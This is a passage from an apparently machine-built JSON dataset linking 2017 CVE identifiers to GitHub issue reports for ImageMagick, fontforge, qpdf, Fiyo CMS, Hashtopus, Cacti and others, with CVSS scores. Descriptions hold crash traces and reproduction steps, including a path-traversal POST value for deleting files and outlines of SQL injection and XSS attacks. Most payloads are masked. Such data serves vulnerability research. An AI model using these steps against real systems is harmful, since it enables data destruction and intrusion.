  6339. "description": "heap overflow in APITAG Crash Link : FILETAG Trigger Command : ./magick convert heap buffer overflow READ APITAG output.ps Crash Information : PATHTAG ./magick convert PATHTAG output.ps APITAG NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG f NUMBERTAG a NUMBERTAG fedcc at pc NUMBERTAG f NUMBERTAG aec0f9c2 bp NUMBERTAG ffcb NUMBERTAG d5a NUMBERTAG sp NUMBERTAG ffcb NUMBERTAG d5a NUMBERTAG READ of size NUMBERTAG at NUMBERTAG f NUMBERTAG a NUMBERTAG fedcc thread T NUMBERTAG f NUMBERTAG aec0f9c1 in APITAG APITAG APITAG NUMBERTAG f NUMBERTAG aec NUMBERTAG ff8 in APITAG APITAG NUMBERTAG f NUMBERTAG ae NUMBERTAG c6 in APITAG APITAG NUMBERTAG f NUMBERTAG ae NUMBERTAG e NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG adf9c3eb in APITAG APITAG NUMBERTAG f NUMBERTAG ae NUMBERTAG d NUMBERTAG in APITAG APITAG NUMBERTAG f1 in APITAG APITAG NUMBERTAG d2 in main APITAG NUMBERTAG f NUMBERTAG ad NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG in _start ( PATHTAG NUMBERTAG f NUMBERTAG a NUMBERTAG fedcc is located NUMBERTAG bytes to the right of NUMBERTAG byte region APITAG allocated by thread T0 here NUMBERTAG f NUMBERTAG af3e NUMBERTAG in __interceptor_posix_memalign ( PATHTAG NUMBERTAG f NUMBERTAG ae8ed8de in APITAG APITAG NUMBERTAG f NUMBERTAG ae6e NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG ae6dd0d1 in APITAG APITAG NUMBERTAG f NUMBERTAG ae6ec1f0 in APITAG APITAG NUMBERTAG f NUMBERTAG ae8b NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG aec NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG ae NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG ae NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG adf NUMBERTAG ad in APITAG APITAG NUMBERTAG f NUMBERTAG ae NUMBERTAG d NUMBERTAG in APITAG APITAG NUMBERTAG f1 in APITAG APITAG NUMBERTAG d2 in main APITAG NUMBERTAG f NUMBERTAG ad NUMBERTAG f in __libc_start_main ( PATHTAG ) SUMMARY: APITAG heap buffer overflow APITAG APITAG APITAG Shadow bytes around the buggy address NUMBERTAG fe NUMBERTAG d NUMBERTAG fe NUMBERTAG d NUMBERTAG fe NUMBERTAG d NUMBERTAG fe NUMBERTAG d NUMBERTAG fe NUMBERTAG da NUMBERTAG fe NUMBERTAG db NUMBERTAG fa[fa]fa fa fa fa fa fa NUMBERTAG fe NUMBERTAG dc0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG fe NUMBERTAG dd0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG fe NUMBERTAG de0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG fe NUMBERTAG df0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG fe NUMBERTAG e NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe NUMBERTAG ABORTING",
  6340. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  6341. "severity": "MEDIUM",
  6342. "baseScore": 6.5,
  6343. "impactScore": 3.6,
  6344. "exploitabilityScore": 2.8
  6345. },
  6346. {
  6347. "CVE_ID": "CVE-2017-11536",
  6348. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/567",
  6349. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/567",
  6350. "Repo_new": "imagemagick/imagemagick",
  6351. "Issue_Created_At": "2017-07-16T18:37:29Z",
  6352. "description": "Memory Leak in APITAG coders/jp2.c. Memory Leak File Link : URLTAG Trigger Command : ./magick convert memory APITAG output.jp2 Leak Detail : ERRORTAG",
  6353. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N",
  6354. "severity": "MEDIUM",
  6355. "baseScore": 6.5,
  6356. "impactScore": 3.6,
  6357. "exploitabilityScore": 2.8
  6358. },
  6359. {
  6360. "CVE_ID": "CVE-2017-11537",
  6361. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/560",
  6362. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/560",
  6363. "Repo_new": "imagemagick/imagemagick",
  6364. "Issue_Created_At": "2017-07-16T13:49:58Z",
  6365. "description": "Crash in APITAG write palm format image. Crash Link : FILETAG Trigger Command : ./magick convert FPE APITAG APITAG Crash Detail : PATHTAG ./magick convert PATHTAG APITAG Aborted (core dumped)",
  6366. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  6367. "severity": "MEDIUM",
  6368. "baseScore": 6.5,
  6369. "impactScore": 3.6,
  6370. "exploitabilityScore": 2.8
  6371. },
  6372. {
  6373. "CVE_ID": "CVE-2017-11538",
  6374. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/569",
  6375. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/569",
  6376. "Repo_new": "imagemagick/imagemagick",
  6377. "Issue_Created_At": "2017-07-16T18:42:01Z",
  6378. "description": "Memory Leak in APITAG coders/png.c. Memory Leak File Link : URLTAG Trigger Command : ./magick convert memory APITAG FILETAG Leak Detail : ERRORTAG",
  6379. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  6380. "severity": "MEDIUM",
  6381. "baseScore": 6.5,
  6382. "impactScore": 3.6,
  6383. "exploitabilityScore": 2.8
  6384. },
  6385. {
  6386. "CVE_ID": "CVE-2017-11539",
  6387. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/582",
  6388. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/582",
  6389. "Repo_new": "imagemagick/imagemagick",
  6390. "Issue_Created_At": "2017-07-18T04:52:17Z",
  6391. "description": "Memory Leak in APITAG coders/png.c. Crash Link : URLTAG Trigger Command : ./magick convert memory APITAG output.art Crash Detail : ERRORTAG",
  6392. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  6393. "severity": "MEDIUM",
  6394. "baseScore": 6.5,
  6395. "impactScore": 3.6,
  6396. "exploitabilityScore": 2.8
  6397. },
  6398. {
  6399. "CVE_ID": "CVE-2017-11540",
  6400. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/581",
  6401. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/581",
  6402. "Repo_new": "imagemagick/imagemagick",
  6403. "Issue_Created_At": "2017-07-18T04:41:54Z",
  6404. "description": "Heap Overflow in APITAG APITAG accessor.h. Crash Link : URLTAG Trigger Command : ./magick convert heap APITAG APITAG Crash Detail : ERRORTAG",
  6405. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  6406. "severity": "MEDIUM",
  6407. "baseScore": 6.5,
  6408. "impactScore": 3.6,
  6409. "exploitabilityScore": 2.8
  6410. },
  6411. {
  6412. "CVE_ID": "CVE-2017-11554",
  6413. "Issue_Url_old": "https://github.com/sass/libsass/issues/2445",
  6414. "Issue_Url_new": "https://github.com/sass/libsass/issues/2445",
  6415. "Repo_new": "sass/libsass",
  6416. "Issue_Created_At": "2017-07-18T13:21:02Z",
  6417. "description": "There is a stack overflow in sassc of the libsass library. This was reported here: CVETAG In this Bugzilla ticket you will find all the information and the code to reproduce the error.",
  6418. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  6419. "severity": "HIGH",
  6420. "baseScore": 7.5,
  6421. "impactScore": 3.6,
  6422. "exploitabilityScore": 3.9
  6423. },
  6424. {
  6425. "CVE_ID": "CVE-2017-11568",
  6426. "Issue_Url_old": "https://github.com/fontforge/fontforge/issues/3089",
  6427. "Issue_Url_new": "https://github.com/fontforge/fontforge/issues/3089",
  6428. "Repo_new": "fontforge/fontforge",
  6429. "Issue_Created_At": "2017-06-14T13:41:09Z",
  6430. "description": "heap buffer overflow in APITAG (psread.c). ERRORTAG Testcase: FILETAG",
  6431. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  6432. "severity": "HIGH",
  6433. "baseScore": 7.8,
  6434. "impactScore": 5.9,
  6435. "exploitabilityScore": 1.8
  6436. },
  6437. {
  6438. "CVE_ID": "CVE-2017-11569",
  6439. "Issue_Url_old": "https://github.com/fontforge/fontforge/issues/3093",
  6440. "Issue_Url_new": "https://github.com/fontforge/fontforge/issues/3093",
  6441. "Repo_new": "fontforge/fontforge",
  6442. "Issue_Created_At": "2017-06-14T13:48:35Z",
  6443. "description": "heap buffer overflow in readttfcopyrights (parsettf.c). ERRORTAG Testcase: FILETAG",
  6444. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  6445. "severity": "HIGH",
  6446. "baseScore": 7.8,
  6447. "impactScore": 5.9,
  6448. "exploitabilityScore": 1.8
  6449. },
  6450. {
  6451. "CVE_ID": "CVE-2017-11570",
  6452. "Issue_Url_old": "https://github.com/fontforge/fontforge/issues/3097",
  6453. "Issue_Url_new": "https://github.com/fontforge/fontforge/issues/3097",
  6454. "Repo_new": "fontforge/fontforge",
  6455. "Issue_Created_At": "2017-06-14T13:54:25Z",
  6456. "description": "global buffer overflow in umodenc (parsettf.c). ERRORTAG Testcase: FILETAG",
  6457. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  6458. "severity": "HIGH",
  6459. "baseScore": 7.8,
  6460. "impactScore": 5.9,
  6461. "exploitabilityScore": 1.8
  6462. },
  6463. {
  6464. "CVE_ID": "CVE-2017-11571",
  6465. "Issue_Url_old": "https://github.com/fontforge/fontforge/issues/3087",
  6466. "Issue_Url_new": "https://github.com/fontforge/fontforge/issues/3087",
  6467. "Repo_new": "fontforge/fontforge",
  6468. "Issue_Created_At": "2017-06-14T13:35:58Z",
  6469. "description": "stack buffer overflow in addnibble (parsettf.c). ERRORTAG Testcase: FILETAG",
  6470. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  6471. "severity": "HIGH",
  6472. "baseScore": 7.8,
  6473. "impactScore": 5.9,
  6474. "exploitabilityScore": 1.8
  6475. },
  6476. {
  6477. "CVE_ID": "CVE-2017-11572",
  6478. "Issue_Url_old": "https://github.com/fontforge/fontforge/issues/3092",
  6479. "Issue_Url_new": "https://github.com/fontforge/fontforge/issues/3092",
  6480. "Repo_new": "fontforge/fontforge",
  6481. "Issue_Created_At": "2017-06-14T13:47:01Z",
  6482. "description": "heap buffer overflow in readcfftopdicts (parsettf.c). ERRORTAG Testcase: FILETAG",
  6483. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  6484. "severity": "HIGH",
  6485. "baseScore": 7.8,
  6486. "impactScore": 5.9,
  6487. "exploitabilityScore": 1.8
  6488. },
  6489. {
  6490. "CVE_ID": "CVE-2017-11573",
  6491. "Issue_Url_old": "https://github.com/fontforge/fontforge/issues/3098",
  6492. "Issue_Url_new": "https://github.com/fontforge/fontforge/issues/3098",
  6493. "Repo_new": "fontforge/fontforge",
  6494. "Issue_Created_At": "2017-06-14T13:55:38Z",
  6495. "description": "global buffer overflow in APITAG (parsettf.c). ERRORTAG Testcase: FILETAG",
  6496. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  6497. "severity": "HIGH",
  6498. "baseScore": 7.8,
  6499. "impactScore": 5.9,
  6500. "exploitabilityScore": 1.8
  6501. },
  6502. {
  6503. "CVE_ID": "CVE-2017-11574",
  6504. "Issue_Url_old": "https://github.com/fontforge/fontforge/issues/3090",
  6505. "Issue_Url_new": "https://github.com/fontforge/fontforge/issues/3090",
  6506. "Repo_new": "fontforge/fontforge",
  6507. "Issue_Created_At": "2017-06-14T13:43:23Z",
  6508. "description": "heap buffer overflow in readcffset (parsettf.c). ERRORTAG Testcase: FILETAG",
  6509. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  6510. "severity": "HIGH",
  6511. "baseScore": 7.8,
  6512. "impactScore": 5.9,
  6513. "exploitabilityScore": 1.8
  6514. },
  6515. {
  6516. "CVE_ID": "CVE-2017-11575",
  6517. "Issue_Url_old": "https://github.com/fontforge/fontforge/issues/3096",
  6518. "Issue_Url_new": "https://github.com/fontforge/fontforge/issues/3096",
  6519. "Repo_new": "fontforge/fontforge",
  6520. "Issue_Created_At": "2017-06-14T13:52:52Z",
  6521. "description": "global buffer overflow in strnmatch (char.c). ERRORTAG Testcase: FILETAG",
  6522. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  6523. "severity": "HIGH",
  6524. "baseScore": 7.8,
  6525. "impactScore": 5.9,
  6526. "exploitabilityScore": 1.8
  6527. },
  6528. {
  6529. "CVE_ID": "CVE-2017-11576",
  6530. "Issue_Url_old": "https://github.com/fontforge/fontforge/issues/3091",
  6531. "Issue_Url_new": "https://github.com/fontforge/fontforge/issues/3091",
  6532. "Repo_new": "fontforge/fontforge",
  6533. "Issue_Created_At": "2017-06-14T13:45:05Z",
  6534. "description": "negative size param in readcfftopdict (parsettf.c). ERRORTAG Testcase: FILETAG",
  6535. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  6536. "severity": "MEDIUM",
  6537. "baseScore": 5.5,
  6538. "impactScore": 3.6,
  6539. "exploitabilityScore": 1.8
  6540. },
  6541. {
  6542. "CVE_ID": "CVE-2017-11577",
  6543. "Issue_Url_old": "https://github.com/fontforge/fontforge/issues/3088",
  6544. "Issue_Url_new": "https://github.com/fontforge/fontforge/issues/3088",
  6545. "Repo_new": "fontforge/fontforge",
  6546. "Issue_Created_At": "2017-06-14T13:38:49Z",
  6547. "description": "global buffer overflow in getsid (parsettf.c). ERRORTAG Testcase: FILETAG",
  6548. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  6549. "severity": "HIGH",
  6550. "baseScore": 7.8,
  6551. "impactScore": 5.9,
  6552. "exploitabilityScore": 1.8
  6553. },
  6554. {
  6555. "CVE_ID": "CVE-2017-11593",
  6556. "Issue_Url_old": "https://github.com/volca/markdown-preview/issues/60",
  6557. "Issue_Url_new": "https://github.com/volca/markdown-preview/issues/60",
  6558. "Repo_new": "volca/markdown-preview",
  6559. "Issue_Created_At": "2017-03-04T23:23:26Z",
  6560. "description": "Sanitize content to avoid XSS. Markdown Preview makes APITAG vulnerable to XSS attacks on files that are not designed to be interpreted by web applications. How to reproduce NUMBERTAG A malicious user creates a txt file (or another format supported by Markdown Preview) with the following content: APITAG NUMBERTAG He uploads it on a remote server using a web application NUMBERTAG If the web application allows the opening of txt files in the browser, Markdown Preview is a vector for XSS attacks, because the JS payload will be executed This behavior makes all users of Markdown Preview vulnerable to XSS attacks in a lot of web sites, because these websites are not designed to escape or force the download of txt files. How to fix Markdown Preview should sanitize the content in order to avoid XSS.",
  6561. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  6562. "severity": "MEDIUM",
  6563. "baseScore": 6.1,
  6564. "impactScore": 2.7,
  6565. "exploitabilityScore": 2.8
  6566. },
  6567. {
  6568. "CVE_ID": "CVE-2017-11594",
  6569. "Issue_Url_old": "https://github.com/loomio/loomio/issues/4220",
  6570. "Issue_Url_new": "https://github.com/loomio/loomio/issues/4220",
  6571. "Repo_new": "loomio/loomio",
  6572. "Issue_Created_At": "2017-07-21T19:36:04Z",
  6573. "description": "FILETAG > Hello, > > I just found an XSS vulnerability in Loomio. > > How to reproduce > > A malicious user creates an new thread > In the description, (s)he enters: APITAG > The targeted user visits the thread and clicks on the malicious link > The JS payload is executed > > How to fix > > \"href\" content should be sanitized > > > I found this vulnerability because I'm currently and voluntarily > searching for XSS vulnerabilities in the services that we offer or use > at the French non profit association Framasoft. > > I remain available for any additional comments or questions. > > Best, > Martin Thanks to the Loomio developers for the fix.",
  6574. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  6575. "severity": "MEDIUM",
  6576. "baseScore": 5.4,
  6577. "impactScore": 2.7,
  6578. "exploitabilityScore": 2.3
  6579. },
  6580. {
  6581. "CVE_ID": "CVE-2017-11610",
  6582. "Issue_Url_old": "https://github.com/Supervisor/supervisor/issues/964",
  6583. "Issue_Url_new": "https://github.com/supervisor/supervisor/issues/964",
  6584. "Repo_new": "supervisor/supervisor",
  6585. "Issue_Created_At": "2017-07-19T14:08:20Z",
  6586. "description": "RCE vulnerability report. Hi, I would like to report Authenticated RCE vulnerability found in supervisord latest build. Please contact me at maors APITAG",
  6587. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  6588. "severity": "HIGH",
  6589. "baseScore": 8.8,
  6590. "impactScore": 5.9,
  6591. "exploitabilityScore": 2.8
  6592. },
  6593. {
  6594. "CVE_ID": "CVE-2017-11624",
  6595. "Issue_Url_old": "https://github.com/qpdf/qpdf/issues/117",
  6596. "Issue_Url_new": "https://github.com/qpdf/qpdf/issues/117",
  6597. "Repo_new": "qpdf/qpdf",
  6598. "Issue_Created_At": "2017-06-04T08:22:45Z",
  6599. "description": "An infinite loop. On qpdf version NUMBERTAG I discovered an infinite loop. CODETAG testcase : URLTAG Credit : APITAG of Venustech",
  6600. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  6601. "severity": "MEDIUM",
  6602. "baseScore": 5.5,
  6603. "impactScore": 3.6,
  6604. "exploitabilityScore": 1.8
  6605. },
  6606. {
  6607. "CVE_ID": "CVE-2017-11625",
  6608. "Issue_Url_old": "https://github.com/qpdf/qpdf/issues/120",
  6609. "Issue_Url_new": "https://github.com/qpdf/qpdf/issues/120",
  6610. "Repo_new": "qpdf/qpdf",
  6611. "Issue_Created_At": "2017-06-04T08:24:58Z",
  6612. "description": "An infinite loop. On qpdf version NUMBERTAG I discovered an infinite loop. CODETAG testcase : URLTAG Credit : APITAG of Venustech",
  6613. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  6614. "severity": "MEDIUM",
  6615. "baseScore": 5.5,
  6616. "impactScore": 3.6,
  6617. "exploitabilityScore": 1.8
  6618. },
  6619. {
  6620. "CVE_ID": "CVE-2017-11626",
  6621. "Issue_Url_old": "https://github.com/qpdf/qpdf/issues/119",
  6622. "Issue_Url_new": "https://github.com/qpdf/qpdf/issues/119",
  6623. "Repo_new": "qpdf/qpdf",
  6624. "Issue_Created_At": "2017-06-04T08:24:29Z",
  6625. "description": "An infinite loop. On qpdf version NUMBERTAG I discovered an infinite loop. CODETAG testcase : URLTAG Credit : APITAG of Venustech",
  6626. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  6627. "severity": "MEDIUM",
  6628. "baseScore": 5.5,
  6629. "impactScore": 3.6,
  6630. "exploitabilityScore": 1.8
  6631. },
  6632. {
  6633. "CVE_ID": "CVE-2017-11627",
  6634. "Issue_Url_old": "https://github.com/qpdf/qpdf/issues/118",
  6635. "Issue_Url_new": "https://github.com/qpdf/qpdf/issues/118",
  6636. "Repo_new": "qpdf/qpdf",
  6637. "Issue_Created_At": "2017-06-04T08:23:50Z",
  6638. "description": "An infinite loop. On qpdf version NUMBERTAG I discovered an infinite loop. ERRORTAG testcase : URLTAG Credit : APITAG of Venustech",
  6639. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  6640. "severity": "MEDIUM",
  6641. "baseScore": 5.5,
  6642. "impactScore": 3.6,
  6643. "exploitabilityScore": 1.8
  6644. },
  6645. {
  6646. "CVE_ID": "CVE-2017-11630",
  6647. "Issue_Url_old": "https://github.com/FiyoCMS/FiyoCMS/issues/6",
  6648. "Issue_Url_new": "https://github.com/fiyocms/fiyocms/issues/6",
  6649. "Repo_new": "fiyocms/fiyocms",
  6650. "Issue_Created_At": "2017-07-20T15:38:47Z",
  6651. "description": "Backuper.php $ type $ file variable have the vulnerability to delete any files. Hello, I found that there are some problems with Fiyo CMS, hoping to help you and your work Fiyo CMS version NUMBERTAG has a vulnerability to remove any file. There is no need to login in when exploiting this vulnerability The code does not correct the $_POST FILETAG Vulnerability Verification (this will remove FILETAG under Web root) Url: FILETAG POST: type = database & file = .. \\ FILETAG Referrer: FILETAG Detailed request packet POST PATHTAG HTTP NUMBERTAG Host: APITAG User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG WOW NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Accept Language: zh CN,zh; APITAG US; APITAG Referer: FILETAG Cookie: APITAG APITAG Connection: close Upgrade Insecure Requests NUMBERTAG Content Type: application/x www form urlencoded Content Length NUMBERTAG FILETAG Discoverer: Neusoft of Rai NUMBERTAG over",
  6652. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  6653. "severity": "HIGH",
  6654. "baseScore": 7.5,
  6655. "impactScore": 3.6,
  6656. "exploitabilityScore": 3.9
  6657. },
  6658. {
  6659. "CVE_ID": "CVE-2017-11631",
  6660. "Issue_Url_old": "https://github.com/FiyoCMS/FiyoCMS/issues/7",
  6661. "Issue_Url_new": "https://github.com/fiyocms/fiyocms/issues/7",
  6662. "Repo_new": "fiyocms/fiyocms",
  6663. "Issue_Created_At": "2017-07-21T06:10:33Z",
  6664. "description": "PATHTAG $ _GET FILETAG APITAG APITAG http:// PATHTAG is the installation path of the site program APITAG Vulnerability Verification\u2460 APITAG a SQL injection attack packet that causes a response delay) APITAG URLTAG Referrer: FILETAG APITAG Detailed http request packet CODETAG The response was delayed by NUMBERTAG seconds FILETAG APITAG APITAG Vulnerability Verification\u2461 APITAG the python script for SQL injection attacks and get the current database user name) Python poc code CODETAG FILETAG Discoverer: Neusoft of Rai4over",
  6665. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  6666. "severity": "CRITICAL",
  6667. "baseScore": 9.8,
  6668. "impactScore": 5.9,
  6669. "exploitabilityScore": 3.9
  6670. },
  6671. {
  6672. "CVE_ID": "CVE-2017-11639",
  6673. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/588",
  6674. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/588",
  6675. "Repo_new": "imagemagick/imagemagick",
  6676. "Issue_Created_At": "2017-07-19T02:30:29Z",
  6677. "description": "Heap Overflow in APITAG APITAG accessor.h. Crash Link : URLTAG Trigger Command : ./magick convert heap APITAG output.cip Crash Detail : ERRORTAG",
  6678. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  6679. "severity": "MEDIUM",
  6680. "baseScore": 6.5,
  6681. "impactScore": 3.6,
  6682. "exploitabilityScore": 2.8
  6683. },
  6684. {
  6685. "CVE_ID": "CVE-2017-11640",
  6686. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/584",
  6687. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/584",
  6688. "Repo_new": "imagemagick/imagemagick",
  6689. "Issue_Created_At": "2017-07-18T16:43:37Z",
  6690. "description": "Address Access Except in APITAG coders/tiff.c. Crash Link : URLTAG Trigger Command : ./magick convert APITAG APITAG Crash Detail : ERRORTAG",
  6691. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  6692. "severity": "MEDIUM",
  6693. "baseScore": 6.5,
  6694. "impactScore": 3.6,
  6695. "exploitabilityScore": 2.8
  6696. },
  6697. {
  6698. "CVE_ID": "CVE-2017-11644",
  6699. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/587",
  6700. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/587",
  6701. "Repo_new": "imagemagick/imagemagick",
  6702. "Issue_Created_At": "2017-07-18T18:33:59Z",
  6703. "description": "Memory Leak in APITAG coders/mat.c. Crash Link : URLTAG Trigger Command : ./magick convert memory APITAG /dev/null Memory Leak Detail : ERRORTAG",
  6704. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  6705. "severity": "MEDIUM",
  6706. "baseScore": 6.5,
  6707. "impactScore": 3.6,
  6708. "exploitabilityScore": 2.8
  6709. },
  6710. {
  6711. "CVE_ID": "CVE-2017-11677",
  6712. "Issue_Url_old": "https://github.com/curlyboi/hashtopus/issues/63",
  6713. "Issue_Url_new": "https://github.com/curlyboi/hashtopus/issues/63",
  6714. "Repo_new": "curlyboi/hashtopus",
  6715. "Issue_Created_At": "2017-07-26T13:55:39Z",
  6716. "description": "Hashtopus NUMBERTAG Multiple Vulnerabilities. SQL Injection (authenticated) A SQL Injection is present in FILETAG on line NUMBERTAG CODETAG APITAG of concept:_ CODETAG Reflective XSS (unauthenticated) An unauthenticated reflective cross site scripting is present on line NUMBERTAG in APITAG APITAG APITAG of concept:_ APITAG CSRF APITAG admin password to login) Cross site request forgery protection is not available on sensitive forms. CODETAG",
  6717. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  6718. "severity": "MEDIUM",
  6719. "baseScore": 6.1,
  6720. "impactScore": 2.7,
  6721. "exploitabilityScore": 2.8
  6722. },
  6723. {
  6724. "CVE_ID": "CVE-2017-11680",
  6725. "Issue_Url_old": "https://github.com/s3inlc/hashtopussy/issues/241",
  6726. "Issue_Url_new": "https://github.com/hashtopolis/server/issues/241",
  6727. "Repo_new": "hashtopolis/server",
  6728. "Issue_Created_At": "2017-07-26T14:08:38Z",
  6729. "description": "APITAG NUMBERTAG Multiple Vulnerabilities. CSRF APITAG Password Change) Cross site request forgery protection is not available on sensitive forms. In the following example is possible to change the admin password: CODETAG Weak ACL Some pages and functionalities were not configured with a proper ACL. It was possible to perform the following actions as user role NUMBERTAG Add voucher Delete voucher Add new agent using the generated voucher Create new hashcat release APITAG vulnerable to Stored XSS affecting all users and roles) Delete new hashcat release The following APITAG can be used to create a new voucher with user role. Afterwards on PATHTAG is possible to show all the available vouchers. CODETAG Stored XSS APITAG by any user or role) By taking advantage of the already discussed APITAG ACL\" issue, a user would be able to create a new Hashcat Release. The XSS is triggered inside FILETAG on the following parameters: version, url and rootdir. The following APITAG is available: ERRORTAG A stored XSS, readable by any role, may trigger a privilege escalation if executed by an administrative role. Open redirect (only with valid credentials) An informational issue for the developer: It was possible to fully control the APITAG response header during the login process, to force the session to be redirected to a third party website. The following request will forward the session to Google: CODETAG Reflective XSS (affecting only authenticated users) Some reflective XSS were identified in CODETAG APITAG APITAG &page NUMBERTAG Stored XSS APITAG affecting user's session) This XSS can be triggered by adding a new notification. This attack is stored, but only readable by current user (who created it basically). The following APITAG if available: CODETAG",
  6730. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  6731. "severity": "HIGH",
  6732. "baseScore": 8.8,
  6733. "impactScore": 5.9,
  6734. "exploitabilityScore": 2.8
  6735. },
  6736. {
  6737. "CVE_ID": "CVE-2017-11691",
  6738. "Issue_Url_old": "https://github.com/Cacti/cacti/issues/867",
  6739. "Issue_Url_new": "https://github.com/cacti/cacti/issues/867",
  6740. "Repo_new": "cacti/cacti",
  6741. "Issue_Created_At": "2017-07-20T07:45:55Z",
  6742. "description": "Cross site scripting (XSS) vulnerability in FILETAG in Cacti NUMBERTAG iaotian. EMAILTAG .cn APITAG From this issue : URLTAG , the Cacti vendor has published the latest NUMBERTAG to fix two XSS vuls. But I just found a new xss vul in NUMBERTAG plz donnt say its the same issue or ask why is there a new CVE number? Because it's a real vul in the latest NUMBERTAG Cross site scripting (XSS) vulnerability in FILETAG in Cacti NUMBERTAG allows remote authenticated users to inject arbitrary web script or HTML via specially crafted HTTP Referer headers NUMBERTAG Request with the special crafted referer header: APITAG APITAG NUMBERTAG Click the APITAG button in the bottom of the page like this: FILETAG NUMBERTAG ss alert. FILETAG",
  6743. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  6744. "severity": "MEDIUM",
  6745. "baseScore": 5.4,
  6746. "impactScore": 2.7,
  6747. "exploitabilityScore": 2.3
  6748. },
  6749. {
  6750. "CVE_ID": "CVE-2017-11692",
  6751. "Issue_Url_old": "https://github.com/jbeder/yaml-cpp/issues/519",
